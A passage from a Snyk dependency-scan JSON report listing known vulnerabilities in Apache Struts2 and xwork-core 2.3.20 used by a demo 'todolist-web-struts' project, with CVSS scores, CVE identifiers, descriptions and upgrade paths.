"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:53.807283Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type. A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5 or higher.\n## References\n- [Bug Report](https://issues.apache.org/jira/browse/WW-5055)\n- [GitHub Commit](https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd)\n", - "epssDetails": { - "percentile": "0.60025", - "probability": "0.00216", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2012-1592" - ], - "CWE": [ - "CWE-434" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2020-09-04T15:56:51.451242Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2019-12-05T15:43:54Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2020-09-04T15:56:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:45:53.807283Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", - "title": "Denial of Service", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Matthew McClain" - ], - "semver": { - "vulnerable": [ - "[,2.5.32)", - "[6.0.0,6.1.2.2)", - "[6.2.0,6.3.0.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.5.32", - "6.1.2.2", - "6.3.0.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711", - "title": "GitHub Commit" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-065", - "title": "Struts Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:08.762991Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:10.404666Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:27.113057Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:08.762991Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:10.404666Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service when certain fields exceed the `maxStringLength` limit during multipart requests. An attacker can exploit this to leave uploaded files in the `struts.multipart.saveDir` even after the request has been denied resulting in excessive disk usage.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.32, 6.1.2.2, 6.3.0.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a)\n- [GitHub Commit](https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7)\n- [GitHub Commit](https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-065)\n", - "epssDetails": { - "percentile": "0.66400", - "probability": "0.00264", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-41835" - ], - "CWE": [ - "CWE-400" - ], - "GHSA": [ - "GHSA-729q-fcgp-r5xh" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2023-12-06T07:04:16.630936Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-12-05T09:33:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2023-12-06T08:01:07.098280Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:10.404666Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.32" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-6102825", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Steven Seeley" - ], - "semver": { - "vulnerable": [ - "[,2.5.33)", - "[6.0.0,6.3.0.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.5.33", - "6.3.0.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj", - "title": "Apache Mailing List" - }, - { - "url": "https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts", - "title": "Exploitation Attempts" - }, - { - "url": "https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md", - "title": "PoC" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-066", - "title": "Struts Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:10.322561Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:10.688470Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-07-23T07:46:17.121104Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:10.322561Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:10.688470Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) via manipulation of file upload parameters that enable path traversal. Under certain conditions, uploading of a malicious file is possible, which may then be executed on the server.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.33, 6.3.0.2 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj)\n- [Exploitation Attempts](https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts)\n- [GitHub Commit](https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163)\n- [GitHub Commit](https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6)\n- [PoC](https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-066)\n", - "epssDetails": { - "percentile": "0.94639", - "probability": "0.09044", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-50164" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2023-12-07T11:44:29.902168Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-12-07T09:45:05Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2023-12-07T12:27:32.361011Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-23T07:46:17.121104Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.33" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", - "title": "Parameter Alteration", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "rskvp93" - ], - "semver": { - "vulnerable": [ - "[2,2.3.24.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.24.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://struts.apache.org/docs/s2-026.html", - "title": "Apache Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:01.496065Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:10.273105Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:49:01.496065Z" - } - ], - "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Parameter Alteration. ValueStack defines special top object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings\n\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-026.html)\n", - "epssDetails": { - "percentile": "0.70008", - "probability": "0.00305", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-5209" - ], - "CWE": [ - "CWE-235" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.673000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-09-28T16:59:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2015-09-28T16:59:30Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:01.496065Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.24.1", - "org.apache.struts.xwork:xwork-core@2.3.24.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.28)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.28" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:46:29.964282Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.122257Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:29.964282Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation via a `%{}` sequence in a tag attribute, aka forced double OGNL evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.28 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364)\n", - "epssDetails": { - "percentile": "0.88004", - "probability": "0.01731", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-0785" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.686000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-03-16T05:58:06Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-03-16T05:58:06Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:29.964282Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.28", - "org.apache.struts.xwork:xwork-core@2.3.28" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.25)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.25" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/fc2179cf1ac9fbfb61e3430fa88b641d87253327", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:47.186038Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:24.610273Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:47.186038Z" - } - ], - "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162)", - "epssDetails": { - "percentile": "0.96202", - "probability": "0.18207", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-2162" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.701000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-03-16T07:51:26.242000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-03-16T07:51:26.242000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:47.186038Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.28", - "org.apache.struts.xwork:xwork-core@2.3.28" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.24.1]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:50.033229Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:35.405967Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:50.033229Z" - } - ], - "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)", - "epssDetails": { - "percentile": "0.90602", - "probability": "0.02732", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3093" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts.xwork:xwork-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.713000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-02T02:16:48.918000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts.xwork", - "artifactId": "xwork-core" - }, - "publicationTime": "2016-06-02T02:16:48.918000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:50.033229Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.24.3", - "org.apache.struts.xwork:xwork-core@2.3.24.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts.xwork:xwork-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", - "title": "Access Restriction Bypass", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.28.1]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts.xwork:xwork-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:46:52.478661Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:39.417349Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:52.478661Z" - } - ], - "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It 